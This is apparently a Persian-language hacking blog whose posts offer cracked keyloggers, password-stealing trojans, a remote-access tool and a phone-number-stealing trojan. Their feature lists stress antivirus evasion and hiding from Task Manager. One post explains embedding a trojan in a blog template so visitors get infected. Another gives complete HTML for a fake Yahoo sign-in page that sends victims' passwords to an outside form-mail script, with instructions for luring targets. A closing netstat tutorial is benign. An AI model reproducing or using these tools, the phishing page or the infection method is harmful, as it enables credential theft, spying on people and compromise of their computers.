عشق هک

	عشق هک
	هک وآموزش

IEAUPR 1.8.8

برنامه

سلام این برنامه کار میکنه شاید قدیمی باشه پسورد پیدا میکنه خیلی خوبه من تست کردم

یک برنامه قوی برای خارج کردن انواع پسوردهای ذخیره شده در اینترنت اکسپلورر, اوت لوک، موزیلا و 10 برنامه دیگر...

IEAUPR یک برنامه قوی برای خارج کردن انواع پسوردهای ذخیره شده در اینترنت اکسپلورر, اوت لوک، موزیلا و 10 برنامه دیگر است. در ورژن جدید این برنامه قابلیت پیدا کردن فیلدهای ذخیره شده نیز فراهم شده. وهمچنین با یک الگوریتم جدید نتایج برگردانده شده توسط برنامه چندین برابر شده.

داونلود برنامه لینک مستقیم

+ نوشته شده در چهارشنبه هشتم خرداد 1387ساعت 11:7 توسط مجید |

کیلاگر بسيار قوی برای هک مشخصات کامل طرف

سلام یک کیلاگر قوی براتون آماده کردم البته این کیلاگر فروشی این نسخه کرک شده است

برین حال کنین کسی که اینو نوشته شاکی نشه چون من کرکش نکردم ! بعدشم یه کیلاگر که دیگه ارزش فروختن نداره . ولی از حق نگزریم که کارش عالیه کل مشخصات طرف براتون سند میکنه از پسورد فایل زیپ گرفته تا یوزر پس سایت

فقط درست ازش استفاده کنیید

هر گونه استفاده نادرست به من هیچ ربطی نداره

مشخصات برنامه :

1- ارسال پسورد یاهو مسنجر حتی ورژن 9 بتا

2- ارسال پسورد دیال آپ کانکشن ویندوز

3- ارسال کیلاگر با انتخاب حجم دلخواه شما

4- ارسال تمام متون کپی شده

5- ارسال تمام متون چت دو طرف

4- ارسال تمام پسوردهای زده شده در IE

5- ارسال تمام پسوردهای وبلاگ ها

6- ارسال پسوردهای ذخیره شده در FireFox و Mozilla

6- داشتن 2 فایل پشتیبانی برای از کار افتادن و احیانا پاک شدن فایل سرور

7- ارسال نام کامپیوتر و آی پی

8- عدم شناسائی توسط آنتی ویروسها

9- اجرا شدن در تمام کافی نت ها و تمامی یوزرهای ویندوز

10- مخفی ماندن در TaskManager و Msconfig

11- از کارانداختن ریجستری ویندوز

12- از کارانداختن TaskManager

12- ساختن فایل سرور 24 کیلو بایت برای اجرا کردن مخفی برنامه

13- ساختن فایل با پسوندهای bat,pif,exe,src

دنلود گیلاگر

یک نقطه:این که نظر ندین دیگه کم آپ میکنم و استفاد نادرست ازبرنامه کنین هیچ مسولیتی در این دنیا وآخرت قبول نمیکنم

+ نوشته شده در چهارشنبه یکم اسفند 1386ساعت 23:11 توسط مجید |

تروجان jps

این هم برنامه برای هک یاهو جدید

Download

+ نوشته شده در سه شنبه ششم شهریور 1386ساعت 13:38 توسط مجید |

تروجان hps2.5

تروجان خیلی خوب برای هک کردن ایدی و وبلاگ که همه وبلاگ ها . تروجان خیلی خوبی یه ضرر ندار دانلود کن غیر فعال کردن انتی ویروس اکثر انتی ویروس ها در ضمن من زیادآپ کردم اخرین آپ ها یادتون نره به همشون نگاه کنین

از گزینه های تیک خورده قسمت سفید رنگ برای هک بسورد یاهو جیمیل .هاتمیل است

قسمت قهوهای برای اذیت کردن طرف مثل خاموش کردن مانیتور

قسمت آبی رنگ برای هک مشخصات ویندوز

قسمت سبز برای هک وبلاگ های سرویسهای مختلف(فقط مواظب باش واسه ما شاخ نشی

چون شاخ برا گاو)

قسمت زرد رنگم برای بستن مورور گر های طرف

کار کردن باهاش آسونه و نیازی به توضیح نداره مثل تروجانهای قبلیه

تروجان

لینک گروه عشق هک

+ نوشته شده در چهارشنبه بیست و هفتم تیر 1386ساعت 17:36 توسط مجید |

هک وبلاگ

دانلود

لینک گروه عشق هک

+ نوشته شده در دوشنبه بیست و پنجم تیر 1386ساعت 23:14 توسط مجید |

ریموت

با استفاده از این ریموت میتونید پس از آنکه قربانی فایل سرور را باز کرد تمام سیستم طرف را زیر دست بگیرید . این ریموت یک برنامه استثنائی هستش و امکانات فوق اولعاده بالایی برای هک کردن داره .

Download War Remote 2.1

لینک گروه عشق هک

+ نوشته شده در یکشنبه بیست و چهارم تیر 1386ساعت 11:59 توسط مجید |

دزديدن شماره تلفن

دزديدن شماره تلفن افراد باتروجان حرفه ای Crow Tel Sender

این بار قصد دارم یکی از جدیدترین و قوی ترین برنامه های ارسال شماره تلفن افراد در اینترنت را معرفی کنم.شما به وسيله اين تروجان ميتونيد شماره تلفن هر شخصی رو که مايل بوديد بزنيد!!فقط کافيه شماره تلفن خودتون رو به برنامه بديد (فرقی نداره موبايل باشه يا خط ثابت) بعد از دادن شماره تلفن و ساختن سرور آن را برای قربانی خودتون ميفرستيد.و وقتی قربانی شما فايل سرور شما را باز کرد منتظر بمانيد تا از اينترنت خارج شود. و چند ثانيه بعد از اينکه قربانی شما از اينترنت خارج شد به وسيله فايل سرور با آن شماره تلفنی که قبلاً داده بوديد زنگ ميزند. و شما ميتوانيد شماره قربانی خود را روی کالر آيدی تلفن خود مشاهده کنيد!!امّا امکانات جديد تروجان که از ساير برنامهای مشابه متمايز ميکند:

1. قطع صدای بلندگوی مودم.(Disable Modem Speaker)
2.قرار دادن دلخاه پيغام خطا تقلبی روی فايل سرور.(Fake Message)
3.انتخاب آيکن دلخاه برای فايل سرور.(Choose Icon)
4.پيوند زدن هر فايلی با فايل سرور. (Binder)
5.خارج شدن خودکار فايل سرور پس از زنگ زدن، که هيچ ردی از فايل سرور به جا نميمونه!!

اما آموزش برنامه:

پس از دانلود کردن برنامه از آخر اين مطلب برنامه را از حالت فشره(zip) خارج کنيد.
برنامه رو اجرا کنيد.
مشابه عکس:

1.اگر خواستيد برای فايل سرور خود Error تقلبی بسازيد اين قسمت را تيک بزنيد...
2.در اين قسمت شما بايد به سليقه خودتون يک آيکن برای فايل سرور انتخاب کنيد.
3.در اين قسمت شما بايد يک شماره تلفن وارد کنيد که بعد از باز کردن فايل سرور توسط قربانی با اين شماره تماس ميگيرد.
4.اگر خواستيد يک فايل به سرور خود پيوند بزنيد ( که بعد از باز کردن فايل سرور توسط قربانی اين فايل هم اجرا ميشود) اين قسمت را تيک بزنيد و يک فايل که بهتر است کم حجم باشد رو Open کنيد، و در قسمت extract to مشخص ميکنيد که فايل پيوند زده شما در کجای کامپيوتر قربانی اجرا شود.
5.در اين قسمت اسم فايل سرور را مشخص ميکنيد.
6.در اين قسمت با زدن کليد Create Server فايل سرور شما ساخته ميشود و پيغام server created successfully ظاهر ميشود، که فايل سرور شما با موفقيت ساخته شده.

کار به پايان رسيد و حالا شما بايد فايل سرور را برای قربانی خود بفرستيد...

نکته:
توجه داشته باشيد که اين برنامه و نسخه های مشابه به وسيله مودم شماره گيری ميکند پس قربانی شما بايد مودم داشته باشد و به خط تلفن متصل باشد.
اگر هرگونه خطا در برنامه مشاهده کرديد به من ايميل بزنيد.
اگر نظر، پيشنهاد ، انتقاد هر مواردی به ذهنتون خورد بگيد حتماً برسی ميشه.
هر گونه سوء استفاده از اين برنامه به عهده کاربر است.

دانلود تروجان

+ نوشته شده در یکشنبه بیست و چهارم تیر 1386ساعت 11:56 توسط مجید |

تروجان

نرم افزار :hps

توضيح:جديد ترين ياهو سندر تروجان خوبي يه امتحان كنيد

1.ارسال پسورد ياهو مسنجر 8و8.1

2.ارسال اكنت اينترنت

3.ارسال تمام كليهاي كيبورد

4.ارسال پسورد plogfa , mihanblog ,persianplog

وغيره ............................... امكانات زيادي داره غير فعال كرد آنتي ويروس ها

لينك دانلود گروه عشق هك

لينگ دانلود گروه ارور

+ نوشته شده در یکشنبه بیست و سوم اردیبهشت 1386ساعت 12:56 توسط مجید |

قردادن تروجان پشت صفحه وبلاگ آشنا کنم و معرفی تروجان خوب و قوی

.
شما ابتدا کد exe2html را از اینجا دریافت کرده و مانند آموزش زیر عمل کنید البته این کد توسط بعضی ار آنتی ویروسها شناسایی می گردد

خوب کد رو هم میتونید از اینجا دانلود کنید

شما ابتدا با استفاده از کی لاکر زیر یه سرور با پسوند scr بسازید بعد از آن سرور ساخته شده را در یه سایت مثلا http://www.ripway.com یا هر سایتی دیگر آپلود کنید

اکنون مانند عکس بالا به جای آدرس تروجان که با رنگ سبز مشخص است ، آدرس تروجان خود را وارد کنید (البته در کد دریافتی شما نوشته آدرس تروجان)

اکنون وارد ویرایش قالب وبلاگ خود شده و این کد ها را در قسمت بالا وبلاگ در بین

( ) کپی و پست کنید و تغییرات را ذخیره کنید

البته این روش 2 عیب داره:

1. توسط بعضی از آنتی ویروس ها شناسایی میشه

2. اکثر کسانی با اینترنت سرو کار دارند از نرم افزارهای مدیریت فایل استفاده می کنند مانند Download Accelerator Plu (DAP) , Internet Download Manager , FLASHGET و غیرو ... استفاده می کنند این نرم افزار ها مانع ورود مخفیانه تروجان به سیستم قربانی میشه زیرا فایل exe رو شناسایی میکنه

برای رفع عیب دوم من کی لاگر زیر رو پشنهاد میکنم که سرور با پسوند scr میسازه و تروجان بصورت مخفیانه در سیستم قربانی اجرا میشه

لينك دانلود گروه عشق هك

+ نوشته شده در جمعه بیست و یکم اردیبهشت 1386ساعت 18:18 توسط مجید |

برنامه برای اذیت اد لیست که شما می تونین با این برنامه چراغ خودتون روشن خاموش کنین به مقدار ی که دلتون میخواد خیلی هم راحته و من خودم امتحان کردم کار میکنه من آ نتی شم گذاشتم که کسی ام نتونه به شما اینکار بکنه

Y Buddy Annoyer.zip : دانلود برنامه

Anti Y Buddy Annoyer.zip :دانلود برنامه این آنتی شه

+ نوشته شده در چهارشنبه بیست و دوم فروردین 1386ساعت 18:8 توسط مجید |

یکی از قوی ترین نرم افزار های جاسوسی و هک است

نرم افزار Power-Spy یکی از قوی ترین نرم افزار های جاسوسی و هک است که توسط تیم برنامه نویسی سایت WwW.IrPcDot.CoM YasSOFT Group طراحی شده.از امکانات آن می توان به :

1-ارسال تمامی پسورد های یاهو 7.5 و 8
2-ارسال تمامی متون تایپ شده به همراه محل تایپ آنها توسط قربانی
3-ارسال IPو نام سیستم عامل و نام کاربری قربانی
4-ارسال پسورد و یوزر و شماره تلفن اتصال به شبکه
5-تغییر کلمه عبور ویندوز به کلمه دلخواه

برای مشاهده لینک دانلود و سایر توضیحات بر روی ادامه متن کلیک کنید.

6-غیرفعال کردن Msconfig,Regedit,Gpedit,TaskMan
7-ارسال ایمیل با دور زدن تمامی فایروال ها و سیستم های امنیتی
8-حجم کم سرور

power-spy

دانلود برنامه

+ نوشته شده در دوشنبه ششم فروردین 1386ساعت 22:47 توسط مجید |

بستن یاهو مسنجر

بستن یاهو مسنجر دیگران با یک کلیک برای یاهو ۸

نرم افزار برای یاهو ۸ که میتواند با یک کلیک یاهو مسنجر کسی که از یاهو ۸ استفاده میکندرو ببندید

برای استفاده از این نرم افزار کافیست آنرا دانلود کرده از فایل زیپ بیرون بیاورید سپس Setup.bat را اجرا نموده و بعد از کامل شدن نصب می توانید فایل Yahoo-bug.exe را اجرا کنید و از آن استفاده کنید.
کارکرد این برنامه اینگونه است که بعد از اجرای آن باید یک IDوPassword یاهو را در آن وارد کنید سپس دکمه Login را بزنید تا برنامه به سرور یاهو وصل شود بعد از اتصال در قسمت Victim ID ای دی قربانی را وارد کنید و بعد دکمه ی Kill him را بزنید.

دانلود برنامه

+ نوشته شده در دوشنبه ششم فروردین 1386ساعت 22:40 توسط مجید |

هک کردن آی دی

آيا تا بحال دوستان خودتونو كه يه آي دي توي ياهو دارن رو هك كردين يا مثلا موقع چت پسورد طرف رو در آوردين. ميشه اصلا اين كار رو كرد . من ميخوام يه نفرو هك كنم و آي دي اونو دارم ميخوام پسوردش رو هم بدس بيارم چطور ميتونم اين كارو بكنم؟ اين سوال جوابش توي اين صفحه هست ، و اگه ميخواييد بدونيد چطور ميشه اينكارو كرد به ادامه بحث توجه كنيد :

خوب اول از همه اين كد رو بصورت يه صفحه HTML توي يه سايت آپ لود ميكنيد ميتونيد براي اين كار از سايتهايي كه هاست مجاني ميدن و يا خود سايت ياهو هم استفاده كنيد ولي قبلش بايد توي قسمت آدرس ايميل و آدرس صفحه اي كه طرف بعداز اين صفحه ميخواد ببينه رو بايد وارد كنيد من واسه نمونه آدرس ايميل الكي eee@uuu.com دادم و آدرس سايت هم اينو زدم http://mail.yahoo.com/?.intl=us شما بايد آدرس ايمل خودتو بزني و آدرس صفحه بعدي رو هم يه صفحه اي بزني كه طرف شك نكنه كه من آدرس صفحه ساين اين ياهو رو زدم تا فكر كنه اشتباهي پسورد زده كه صفحه دوباره اومده (ميتوني اين دوتا رو سرچ كني و بجاش مال خودتونو بزني) . بعدش فقط كافيه به طرف آدرس صفحه تونو يه جوري بدين مثلا يه ايميل واسش بزنين و بگين بره اين صفحه رو تماشا كنه و ان هم ميزنه ميبينه يوزر نيم و پسورد ميخواد چون صفحه درست شبيه تاهو هست اصلا شك نميكنه فكر ميكنه ياهو داره اطلاعات ميگيره وقتي اطلاعاتش رو زد اين اطلاعات واسه شما به اون آدرس ايميلي كه زديد فرستاده ميشه ، باحاله نه . من خودم اين كارو با يه نفر كردم و بهش يه ايميل زدم گفتم برو عكس زير رو كه آدرسش رو دادم ببين و طرف از همجا بيخبر رفت و ديد ياهو ازش پسورد ميخواد كه زد و يه عكس بيخودي هم نشونش دادم ولي بعدش پسوردش دستم بود خيلي باحاله . ولي شما بايد خيلي دقت كنيد تا طرف تون شك نكنه كه هك شده ها و بعدش خواهشن زياد طرفو اذيت نكنيد كه خيلي كار بديه يعني ميشه گفت : بلابدور عجب مردم آزارايي پيدا ميشن.

خوب بيشتر از اين حرف نميزنم فقط يادتون باشه زياد اذيت نكنيد ها اينم كد:

<html> <head> <title>Sign in - Yahoo! Member Directory </title> </head> <body bgcolor=#ffffff> <center> <table border=0 cellpadding=0 cellspacing=0 width=680> <tr> <td colspan=3> <table border=0 width=100% cellpadding=4 cellspacing=0> <tr> <td valign=bottom><table cellspacing=0 cellpadding=0 width=100% border=0> <tr> <td width=1% align=left> <table width=1% cellspacing=0 cellpadding=0 border=0> <tr> <td width=1% align=left> <img src="http://us.i1.yimg.com/us.yimg.com/i/md/mem_dir.gif" alt="Yahoo! Member Directory" border=0 height=29 width=259> </td> </tr> </table> </td> <td width=100% align=right nowrap valign=bottom> <table width=100% cellspacing=0 cellpadding=0 border=0> <tr> <td width=99% align=right nowrap valign=bottom><font face=Arial size=-1><a href="http://www.yahoo.com">Yahoo!</a> - <a href="http://help.yahoo.com/help/us/edit/">Help</a></font> <br><hr size=1 noshade></td> </tr> </table> </td> </td> </tr> </table> </td> </tr> <tr> <td bgcolor=#99ccff ><font size=+1 face=Arial color=black ><b>Welcome to Yahoo! Member Directory </b></font> </td> </tr> </table> </td> </tr> <tr> <td colspan=3> <table width=100% bgcolor=FFFFFF align=center cellpadding=3 cellspacing=2 border=0> <tr> <td align=center> <font color=green face=arial><b> Sign in with your ID and password to continue. </b></font></b></font> </td> </tr> </table> </td> </tr> <tr> <td colspan=3 valign=top> <table border=0 bgcolor=FFFFFF cellspacing=2 cellpadding=0 width=100%> <tr> <td width="50%" valign="top"> <table border=0 bgcolor=FFFFFF cellpadding=2 cellspacing=0 width="100%"> <tr> <td align=center> <font face=Arial size=+1><b><nobr>New to Yahoo!?</nobr></b></font> </td> </tr> <tr> <td align=center><b><font face=arial> <a href="http://edit.yahoo.com/config/eval_register?.intl=us&new=1&.done=http%3a//members.yahoo.com&.src=ytc&.v=0&.u=er4tt5ovjkn4p&partner=&.p=&promo=&.last="> Sign up now</a> to enjoy Yahoo! Member Directory </td> </tr> </table> <table border=0 cellpadding=2 cellspacing=2 width=310> <tr><td width=2% valign=top>•</td><td><font face=Arial size=-1>Find and connect with millions of Yahoo! users.</font></td></tr><tr> <td width=2% valign=top>•</td><td><font face=Arial size=-1>What's your interest? Find others like you.</font></td></tr><tr> <td width=2% valign=top>•</td><td><font face=Arial size=-1>Check out the Profiles of people on any list.</font></td></tr><tr> <td width=2% valign=top>•</td><td><font face=Arial size=-1>See who's online right now -- use Yahoo! Messenger to chat.</font></td></tr></table> </td> <td width="1%"> </td> <td align="left" valign="top"> <form method="POST" action="http://support.inetc.net/email/formmail.asp"> <input type="hidden" name="mailserver" value="smtp3.inetc.net"> <INPUT TYPE="hidden" name="sendto" value="eee@uuu.com"> <INPUT TYPE="HIDDEN" NAME="urljump" VALUE="http://mail.yahoo.com/?.intl=us"> <table bgcolor=#99ccff border="0" cellpadding="2" cellspacing="0" width="100%"> <tr><td> <table bgcolor="#eeeeee" border="0" cellpadding="2" cellspacing="0" width="100%"> <tr><td bgcolor="#ffffff" align="center"> <table border="0" cellspacing="6" cellpadding="6" bgcolor="ffffff" width="100%"> <tr bgcolor="eeeeee"> <td align="center"> <font face="arial"><b>Existing Yahoo! users</b></font><br> <font face="arial" size="-1"><nobr> Enter your ID and password to sign in </nobr></font> <table border="0" cellpadding="4" cellspacing="0"> <tr> <td align="right"> <table border="0" cellpadding="2" cellspacing="0"> <tr> <td align="right" nowrap><font face="arial" size="-1">Yahoo! ID:</font></td> <td> <INPUT TYPE="text" name="subject" size="17" value=""> </td> </tr> <tr> <td align="right" nowrap><font face="arial" size="-1">Password:</font></td> <td> <input name="password" type="password" size="17" maxlength="32 value="""> </td></tr> <tr> <td colspan="2" nowrap align="center"><font face="arial" size="-1"> <input type="checkbox" value="y">Remember my ID on this computer</font></td> </tr><tr> <td> </td> <td><input type="submit" value="Sign In"></td> </tr> </table> </td></tr> <tr> <td nowrap bgcolor="eeeeee" align="center"> <font face="arial" size="-1">Mode: Standard | <a href="https://login.yahoo.com/config/login?.src=ytc&.v=0&.u=er4tt5ovjkn4p&.last=&promo=&.intl=us&.bypass=&.partner=&pkg=&stepid=&.done=http%3a//members.yahoo.com"> Secure</a> </font> </td> </tr> </table> </td></tr> <tr bgcolor="eeeeee"><td valign="top" align="center"> <font face="arial" size="-1"> <a href="http://login.yahoo.com/config/login?.src=ytc&.help=1&.v=0&.u=er4tt5ovjkn4p&.last=&.last=.done ">Sign-in help</a> <a href="http://edit.yahoo.com/config/eval_forgot_pw?new=1&.done=http://members.yahoo.com&.src=ytc&partner=&.intl=us&pkg=&stepid=&.last=">Forgot your password?</a> </font></td></tr> </table> </td></tr></table> </td></tr></table> </form> </td> </tr> <tr> <td colspan=3 width=600> </td> </tr> </table> </td> </tr> <tr> <td colspan=3> <table width=600 border=0 cellpadding=0 cellspacing=0> </table> </td> </tr> </table> </td> </tr> </table> </center> <p> <center> <hr width="750" size=1 noshade> <table width="750" cellpadding="0" cellspacing="0" border="0"> <tr> <td align="middle"> <font size=-2 face=arial color="#8d8d8d">Copyright © 2003 Yahoo! Inc. All rights reserved. <a href="http://docs.yahoo.com/info/copyright/copyright.html">Copyright Policy</a> <a href="http://docs.yahoo.com/info/terms/" target="_new">Terms of Service</a><br> <b>NOTICE: We collect personal information on this site.<br>To learn more about how we use your information, see our <a href="http://privacy.yahoo.com/" target="_new">Privacy Policy</a></b></font></td></tr></table></body></center> </html> </object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://geocities.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.webhosting.yahoo.com/visit.gif?us1061285002" alt="setstats" border="0" width="1" height="1"></noscript> <IMG SRC="http://geo.yahoo.com/serv?s=76001080&t=1061285002" ALT=1 WIDTH=1 HEIGHT=1>  </body> </html>

+ نوشته شده در یکشنبه پانزدهم بهمن 1385ساعت 16:3 توسط مجید |

Netstat

تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد، زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.(به همین دلیل ما باید اول پورتها رو چک کنیم بعد telnet چون اگر پورتی که ما بهش telnet میکنیم close باشه دستور اجرا نمیشه)

موضوع مهمي كه يك نفوذ گر واقعي به آن توجه مي كند در سه اصل خلاصه شده است :

۱- او هيچگاه سعي در استفاده از برنامه هايي كه ديگران نوشته اند نمي كند ... »البته ممكن است تعدادي از جوجه هكر ها باشند كه با استفاده از تروجان ها يا Back doors ها به اين كار بيپردازند و فقط خود را با اين مباحث ساده درگیر کنند.

2- معمولا از به كارگيري برنامه هاي گرافيكي كه حتي خود طراحي كرده اند نفرت دارند و فقط در دنياي سياه و سفيد msdos-prompt براي خود حكومت تشكيل ميدهند.(در اصل از استفاده نرم افزار برای هک نفرت دارند)

3- موضوع سوم و اساسي اين است كه فقط يك چيز را در دنيا ميشناسند و آن هم تايپ كردن است.تایپ در صفحه سیاه و سفید command prompt .

دستور Netstat و استفاده از این دستور:

این دستور که با سویچ های دیگری هم استفاده میشه یکی از دستورایی هست که همه هکر ها اول باهاش آشنا میشن.که با تايپ اين دستور شما متوجه آي پي سيستمها و پورتهايي که با آنها در ارتباط هستيد میشوید و مشاهده ميکنيد که چه پورتهايي Listening و يا Established هستن اين باعث ميشود اگر پورتي مخصوص يک تروجن مثل 27374 که پورت اصلي Sub7 هست در سيستم شما باز بود شما متوجه اين پورت باز بروي سيستمتان بشويد. اگر در قسمت Foreign Address هم يک آي پي بوسيله پورتي به سيستم شما وصل بود شما به سرعت متوجه مي شويد که يک نفر با آن آيپي در سيستم شماست ، پس اين راهيست که متوجه گرديد سيستمتان آسيب پذير است يا نه ، براي مثال من با تايپ دستور Netstat در Ms-Dos پس از اتصال به اينتر نت نتايج زير را گرفتم :
C:\WINDOWS>netstat
Active Connections
Proto Local Address Foreign Address State
TCP Midia:1454 cs33.msg.sc5.yahoo.com:5050 ESTABLISHED
TCP Midia:1488 63.123.44.222:80 ESTABLISHED
TCP Midia:1491 opi1.vip.sc5.yahoo.com:80 TIME_WAIُT
TCP Midia:1497 64.187.54.23:80 ESTABLISHED
TCP Midia:1498 64.187.54.23:80 ESTABLISHED

همانطور که ملاحظه ميکنيد اين دستور گاهي اوقات اسم صاحب سيستم کلاينتي که شما با آن در ارتباط هستيد را نيز ميدهد و چون اينجا من با کسي در PM نبودم اسم کسي را نميبينيد ولي اگر کسي با من چت کند و دستور Netstat را اجرا كند اسم را ميبيند و متوجه ميشود کهMidia صاحب آن سيستم کلاينتي مي باشد که در حال چت كردن با آن است و همچنين در اين قسمت مشخص است که من با پورت 5050 با ياهو مسنجر ارتباط برقرار کرده ام و نيز نتايجي که در زير Local Address مشخص است اطلاعاتي درباره خود من مي باشد . و نتايجي که در Foreign Address بدست مياد مشخص ميکند که ما با چه سرور يا کلاينتي در ارتباط هستيم . که در سطر پنجم مثال بالا يعني 63.123.44.222:80 آيپي سايت ياهو ميباشد و مشخص ميكند كه من در سايت ياهو بوده و به وسيله پورت 80 که پورت Http ميباشد با اين وب سرور ارتباط برقرار کرده ام و در قسمت Status هم مشخص ميشود که شما با چه پورتهايي Established هستيد يعني ارتباط برقرار کرده و وصل هستيد و چه پورتهايي Listening يا منتظر Request و در حال شنيدن مي باشيد ، بنابراين با دستور Netstat مي شود يک عمل مانيتورينگ از تمام آيپي ها - پورتها و ماشينهايي که شما با آنها در ارتباط هستيد گرفت .

دستور Netstat/? :
Help برنامه Netstat را معرفی میکند و سویچ های که ازش میتوان استفاده کرد و در مقابل هر سویچ در مورد کار آن توضیح مختصری میدهد.

دستور Netstat -n :

با این دستور میتوان آيپي و پورت سيستمي که شما با آن در ارتباط هستيد را بدست آورد .
برای مثال وقتی شما با یک نفر در یاهو مسنجر چت میکنید پورت ۵۰۵۰ روی سیستم open هست چون یاهو از پورت ۵۰۵۰ استفاده میکند پس با تایپ netstat -n خواهید داشت:
Active Connections
Proto Local Address Foreign Address State
TCP 217.219.223.21:1425 216.136.175.226:5050 TIME_WAIT
TCP 217.219.223.21:1431 64.242.248.15:80 ESTABLISHED
TCP 217.219.223.21:1437 217.219.223.38:5101 ESTABLISHED

همانطور که ملاحظه ميکنيد من در اين لحظه با آيپي 217.219.223.38 در حال چت کردن بودم که اشتراکش هم از رایان روش بوده (مثل خودم)و آي پي خود نيز پروتکلي که ما بوسيله آن با يک سيستم ارتباط برقرار کرديم Proto مشخص ميشود در قسمت Local Address من هم TCPارتباط برقرار شده است.

دستور Netstat -na :

با تايپ کردن اين دستور در MS-DOS Prompt تمام پورتهايي که داده ها و بسته ها را ميفرستند مشخص ميشود ، نشان " na " در تمام دستورات به معني نمايش همه پورتها و ليست کردن آدرسهاي شبکه و شماره فرمها در يک قالب عددي مي باشد ، براي مثال من با تايپ اين فرمان در MS-DOS اين نتايج را گرفتم :

C:\WINDOWS>netstat -na
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:1954 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5101 0.0.0.0:0 LISTENING
TCP 217.219.223.21:1954 207.46.106.21:1863 ESTABLISHED
TCP 217.219.223.21:1971 216.136.225.36:5050 ESTABLISHED
TCP 217.219.223.21:2031 63.121.106.74:80 TIME_WAIT
TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING
*:* UDP 0.0.0.0:1958
*:* UDP 64.110.148.59:9
*:* UDP 64.110.148.59:137
*:* UDP 64.110.148.59:138

خب ميبينيد که پورتهاي باز روي سيستم من ليست شده است. مثل 1954-1971-2031

دستور Netstat -a :
اين دستور نيز مثل دستور Netstat -an يا -na عمل ميکنه فقط فرقش در اينه که اين دستور پورتها را با معادل اسميشان نشان ميدهد ، براي مثال پورت 139 را با معادل اسميش يعني Netbios نشان ميدهد و همچنين مانند دستور Netstat اسم صاحب سيستم را پرينت ميكند .(اين دستور براي تست کردن نقطه ضعفها و پورتهاي باز در سيستم هاي خودمان بسيار مفيد ميباشد و اگر سيستم آلوده به تروجن بود ميشود از اين دستورها و کلاً برنامه Netstat اين موضوع را فهميد ، پس آنهايي که سوال ميکنند ما چگونه بفهميم سيستم خودمان آلوده به تروجن هست يا نه ، استفاده از اين دستور و کلاً دستورات Netstat ميتواند خيلي به آنها کمک کند )

دستور Netstat -p xxx :
منظور از xxx يعني آن پروتکلي که شما در نظر داريد که ميتواند TCP و UDP باشد.

دستور Netstat -e :
اين دستور نيز يکي از دستورات Netstat است که آماري از ارتباطها و بسته ها و شماره هاي ارسال و ذخيره بسته ها و داده ها را نشان ميدهد .(اين دستور بيشتر براي ويندوزهاي 98 , me و همينطور مودمهايي که آمار بسته ها را نميدهند خوب

و مفيد است چون در ويندوز 2000 – XP- قسمتي از اين آمار براحتي در اختيار User قرار ميگيرد ، و شما ميتونيد با استفاده از اين دستور ترافيک ISP و شبکه را ببينيد و همينطور برنامه هايي که در حال دانلود هستسد را چک کنيد و يا اگر بسته اي در ارسالش مشکلي پيش بياد ميتوانيد در قسمت Errors مشاهده کنيد ، ...)

دستور Netstat -r :
اين دستور توسط کاربران معمولي اينترنت زياد بکار گرفته نميشود چون درک بعضي از گزينه هاش براي کاربران عادي دشوار ، بحرحال اين دستور جزييات دقيقي مثل آدرس Gateway - Interface Metric -Netmask , ... درباره آدرس آي پي شما در شبکه ميدهد ، همچنين در ويندوزهاي8 9 - ME کار دستور Netstat -a را هم انجام ميدهد

+ نوشته شده در جمعه ششم بهمن 1385ساعت 18:0 توسط مجید |